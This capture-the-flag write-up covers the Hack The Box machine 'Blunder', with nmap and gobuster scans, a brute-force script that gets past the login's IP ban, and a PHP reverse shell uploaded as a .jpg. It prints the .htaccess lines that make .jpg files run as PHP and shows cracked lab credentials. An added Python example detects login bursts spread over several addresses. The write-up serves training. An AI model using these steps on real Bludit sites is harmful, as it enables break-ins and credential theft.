Hack the Box - Blunder

Machine IP: 10.10.10.191

Reconnaissance

NMAP

▶ nmap -Pn -sS -O -p- 10.10.10.191 -T4 --min-rate 1000 -oN ports.nmap

Nmap scan report for 10.10.10.191
Host is up (0.19s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http
Device type: general purpose|storage-misc|WAP
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (98%), HP embedded (91%), Ubiquiti AirOS 5.X (89%), Ubiquiti embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:ubnt:airos:5.2.6 cpe:/h:ubnt:airmax_nanostation
Aggressive OS guesses: Linux 5.0 (98%), Linux 5.4 (93%), Linux 5.0 - 5.4 (93%), HP P2000 G3 NAS device (91%), Linux 4.15 - 5.6 (91%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Linux 5.1 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.49 seconds

▶ nmap -sC -sV -p 21,80 10.10.10.191 -oN services.nmap

Nmap scan report for 10.10.10.191
Host is up (0.18s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds

HTTP 80

Content Discovery

▶ gobuster dir --url http://10.10.10.191 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --threads 20

  • Bludit admin login.

▶ gobuster dir --url http://10.10.10.191 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --threads 20

  • Probably the CMS is running an older version.
  • Potential username fergus.

Brute-Force Credentials

  • A potential username fergus is found. Attempt to brute-force the password of this user for the CMS.

  • The source IP address gets banned after a few brute-force attempts.

Brute-Force Mitigation Bypass

▶ python exploit.py -l http://10.10.10.191/admin/login.php -u users.txt -p passwords.txt

  • Valid password RolandDeschain found for the user fergus.

Login with the credentials to the Bludit dashboard.

  • Login successful to Dashboard.
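The ban in the previous section was keyed on the source address and was still bypassed, so a defender should also count attempts against the login endpoint itself, whatever address they claim to come from. The following is an added example, not part of the writeup: it parses Apache combined-format access-log lines (a format assumed here; the writeup shows no server logs) and compares a per-IP lockout against an endpoint-wide sliding-window count, on a constructed sample of login POSTs to the /admin/login.php path from the page.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Apache "combined" access-log line (assumed format; the writeup shows no server logs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], TS_FMT)
    return event

def login_burst_stats(lines, login_path="/admin/login.php", window=timedelta(seconds=60),
                      per_ip_ban=5, global_threshold=10):
    """Compare a per-IP lockout with an endpoint-wide sliding-window count of login POSTs."""
    events = sorted((e for e in map(parse_line, lines)
                     if e and e["method"] == "POST" and e["path"] == login_path),
                    key=lambda e: e["ts"])
    by_ip = Counter(e["ip"] for e in events)
    max_per_ip = max(by_ip.values(), default=0)
    max_in_window, start = 0, 0
    for end, ev in enumerate(events):            # sliding window over sorted timestamps
        while ev["ts"] - events[start]["ts"] > window:
            start += 1
        max_in_window = max(max_in_window, end - start + 1)
    # Attempts spread over several addresses stay under the per-IP ban,
    # but the endpoint-wide window still sees the whole burst.
    return {
        "attempts": len(events),
        "distinct_ips": len(by_ip),
        "max_per_ip": max_per_ip,
        "per_ip_ban_fires": max_per_ip >= per_ip_ban,
        "max_in_window": max_in_window,
        "endpoint_alert": max_in_window >= global_threshold,
    }

def constructed_log():
    """Constructed sample: one benign GET, then 12 login POSTs from 4 addresses within 34 s."""
    rows = [("10.10.14.2", 0, "GET", "/admin/")]
    rows += [(f"10.10.14.{2 + i % 4}", 1 + 3 * i, "POST", "/admin/login.php") for i in range(12)]
    return [f'{ip} - - [01/Jun/2020:10:00:{sec:02d} +0000] "{m} {p} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'
            for ip, sec, m, p in rows]
```

On the constructed sample no single address reaches the per-IP ban threshold, while the endpoint-wide window counts all 12 attempts and raises the alert.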

  • Upload a PHP reverse shell to the target machine.

▶ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

  • Change the IP address and port in the shell code.

  • Change the extension of the shell file from .php to .jpg.

  • Upload the shell and modify the UUID by intercepting the upload request in Burp Suite.

  • Also upload an .htaccess file so that the .jpg is executed as PHP.

Contents of the .htaccess file:

RewriteEngine off
AddType application/x-httpd-php .jpg

  • Browse to the location of the uploaded shell.
  • Start a netcat listener.

Upgrade shell to TTY

  • Uploading linpeas.sh

Username: Hugo
Password: faca404fd5c0a31cf1897b823c695c85cffeb98d

Cracked Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
